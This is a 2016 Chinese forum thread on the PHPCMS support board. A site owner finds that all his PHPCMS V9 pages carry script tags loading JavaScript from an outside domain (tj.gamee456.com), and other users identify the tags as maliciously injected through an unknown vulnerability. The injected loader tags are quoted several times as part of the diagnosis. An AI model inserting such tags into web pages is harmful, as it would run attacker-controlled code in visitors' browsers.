查看: 5119|回复: 13

[新改进] 紧急通告针对v9的跨域

[复制链接]
发表于 2016-11-19 03:35:47 | 显示全部楼层 |阅读模式
麻烦管理仔细研究一下。 ie7以下浏览器不显示。 10以上就出来了。 google 搜索v9跨域。 这个是什么原因。 大家研究下。告诉我 我好补上

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?点击这里注册

x
发表于 2016-11-19 09:02:13 | 显示全部楼层
PHPCMS V9根目录下的js.html的标题被爬去了
可以使用robot.txt禁止蜘蛛爬取这个页面
回复 支持 反对

使用道具 举报

 楼主| 发表于 2016-11-19 23:54:16 | 显示全部楼层
下午出去玩了。  还有网站里所有的页面 都有这个 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="http://tj.gamee456.com/jquery.1.8.3.js"></script>
<script>var myname183a04f3731811e6ada0363265356661 = "445893";</script>
<script src="http://tj.gamee456.com/ShowAd_183a04f3731811e6ada0363265356661.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=gbk" />
<meta http-equiv="X-UA-Compatible" content="IE=7" />   烦人 。怎么解决
回复 支持 反对

使用道具 举报

 楼主| 发表于 2016-11-19 23:55:53 | 显示全部楼层
专家帮我看看。 看明天能搞定吗。  我都把数据库都搞的上不去了。 全部静态页面也不行。我看好多网站有。我用的谷歌的浏览器。 但是用ie 就没有 这个代码
头部
回复 支持 反对

使用道具 举报

 楼主| 发表于 2016-11-20 00:03:31 | 显示全部楼层
StyleStudio 发表于 2016-11-19 09:02
PHPCMS V9根目录下的js.html的标题被爬去了
可以使用robot.txt禁止蜘蛛爬取这个页面

根目录就没有这个js 文件。 里面就是js 代码。  这个不对。 大家检查下。
回复 支持 反对

使用道具 举报

 楼主| 发表于 2016-11-20 12:55:55 | 显示全部楼层
大神哪去了。 帮我啊。
回复 支持 反对

使用道具 举报

发表于 2016-11-20 13:30:57 | 显示全部楼层
不是js文件 是HTML文件
文件名 js.html
回复 支持 反对

使用道具 举报

 楼主| 发表于 2016-11-20 13:33:00 | 显示全部楼层
刚才仔细看了下 现在下载下来 真的有个js 文件啊。 官方的人哪去了  
回复 支持 反对

使用道具 举报

 楼主| 发表于 2016-11-20 13:58:23 | 显示全部楼层
哥哥你现在下载下来看看 绝对不是正规代码
回复 支持 反对

使用道具 举报

发表于 2016-11-21 07:45:32 | 显示全部楼层
你这个问题肯定是其他方面的安全漏洞造成
和你用google搜索js跨域搜索到的结果没关系
回复 支持 反对

使用道具 举报

 楼主| 发表于 2016-11-21 09:59:46 | 显示全部楼层
确实是。能看下那个代码吗
下午出去玩了。  还有网站里所有的页面 都有这个 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="http://tj.gamee456.com/jquery.1.8.3.js"></script>
<script>var myname183a04f3731811e6ada0363265356661 = "445893";</script>
<script src="http://tj.gamee456.com/ShowAd_183a04f3731811e6ada0363265356661.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=gbk" />  这是什么意思  什么原因造成的
回复 支持 反对

使用道具 举报

发表于 2016-11-21 10:14:59 | 显示全部楼层
tj.gamee456.com 如果不是你的站
那么下面三段JS就是被恶意加上的
<script src="http://tj.gamee456.com/jquery.1.8.3.js"></script>
<script>var myname183a04f3731811e6ada0363265356661 = "445893";</script>
<script src="http://tj.gamee456.com/ShowAd_183a04f3731811e6ada0363265356661.js"></script>
回复 支持 反对

使用道具 举报

发表于 2016-11-21 10:15:58 | 显示全部楼层
具体利用哪里的漏洞这个我不知道
回复 支持 反对

使用道具 举报

 楼主| 发表于 2016-11-21 13:12:06 | 显示全部楼层
看到的 研究下啊。烦人 那代码是什么意思。 哪方面的漏洞
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 点击这里注册

本版积分规则

小黑屋|Archiver|phpcms网站管理系统 ( 京ICP备14011169 )

GMT+8, 2019-9-15 13:59 , Processed in 0.222886 second(s), 8 queries , Memcache On.

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表